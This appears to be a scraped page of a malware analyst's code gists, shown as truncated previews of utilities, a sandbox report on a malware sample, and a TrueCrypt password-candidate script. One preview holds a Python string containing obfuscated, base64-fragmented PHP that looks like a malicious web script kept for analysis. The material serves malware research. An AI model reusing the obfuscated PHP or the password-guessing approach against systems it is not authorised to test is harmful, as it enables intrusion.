def get_NET_version(data): | |
""" | |
Code to extract .NET compiled version. | |
typedef struct t_MetaData_Header { | |
DWORD Signature; // BSJB | |
WORD MajorVersion; | |
WORD MinorVersion; | |
DWORD Unknown1; | |
DWORD VersionSize; | |
PBYTE VersionString; |
### Keybase proof | |
I hereby claim: | |
* I am Rurik on github. | |
* I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
* I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
To claim this, I am signing this object: |
# Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
import os | |
def process_running(procname): | |
def find_pid(processname): | |
import win32com.client | |
for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
if proc.Name.upper() == processname.upper(): | |
return proc.Properties_('ProcessId') | |
import os | |
import subprocess | |
# Hard-coded, single-machine settings for driving TrueCrypt from this script.
# NOTE(review): the leet_lookup table that follows suggests this script
# generates password candidates for the container below; only run it against
# a volume you own or are explicitly authorised to test.
tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"  # TrueCrypt binary invoked via subprocess (presumably; confirm below)
tc_file = "E:\\test.tlc"  # container file under test — path is quoted-literal here, check how it is passed to the shell
drive_letter = "P"  # drive letter the container is expected to mount to — TODO confirm usage
def leet_lookup(char): | |
list = {"a": ["a","A","@"], | |
"b": ["b", "B", "8"], |
import os | |
import sys | |
from PyQt4.QtCore import * | |
from PyQt4.QtGui import * | |
import base64 | |
def main(): | |
app = QApplication(sys.argv) | |
w = MyWindow() | |
w.show() |
-=] Sandbox Analysis Report generated by Noriben v1.7.0 | |
-=] Developed by Brian Baskin: brian @@ thebaskins.com @bbaskin | |
-=] The latest release can be found at https://github.com/Rurik/Noriben | |
-=] Analysis time: 61.84 seconds | |
Processes Created: | |
================== | |
[CreateProcess] python.exe:2420 > "C:\malware\hehda.exe" [Child PID: 1764] | |
[CreateProcess] hehda.exe:1764 > "%WinDir%\system32\cmd.exe" [Child PID: 692] |
### Tracks a public Twitter List and posts updates to a given Slack channel | |
### Example: https://i.imgur.com/RMQB27N.png | |
import datetime
import os
import time

import twitter
from slackclient import SlackClient
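# Slack settings.  Read from the environment first so the real value never has
# to be pasted into this file (and then committed or shared by accident); the
# '<FILL OUT>' placeholder is kept as the fallback so the original edit-in-place
# workflow still works unchanged.
# NOTE(review): whether slack_bot_id is the bot's API token or just its user ID
# is not visible here — check how SlackClient is constructed further down.
slack_bot_id = os.environ.get('SLACK_BOT_ID', '<FILL OUT>')
slack_channel = os.environ.get('SLACK_CHANNEL', '<FILL OUT>')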
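Windows Registry Editor Version 5.00

; Adds a "Command Prompt Here" verb to the context menu of every file-system
; object.  %L expands to the long path of the clicked item.
; "cd /d" is used instead of plain "cd": if cmd.exe happens to start on a
; different drive than the item, plain "cd" silently stays put, whereas "/d"
; switches drive and directory together.
; NOTE(review): AllFilesystemObjects includes files, and "cd" into a file path
; fails ("The directory name is invalid"); a Directory-only key would be more
; precise if the verb is meant for folders.
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command]
@="cmd.exe /k cd /d \"%L\""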
import base64 | |
script = """ | |
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
# Procmon Rule Parser v0.02 | |
# Brian Baskin - @bbaskin | |
# Reads default rules from an exported Procmon Configuration (.PMC) or Procmon Filter (.PMF) file | |
# Example output: | |
""" | |
12:09:59-bbaskin@~/Development/Noriben$ python parse_procmon_filters.py -f ProcmonConfiguration.pmc | |
[Exclude] Process Name is Procmon64.exe | |
[Exclude] Operation is QueryStandardInformationFile | |
[Exclude] Operation is RegOpenKey | |
[Exclude] Operation is NotifyChangeDirectory |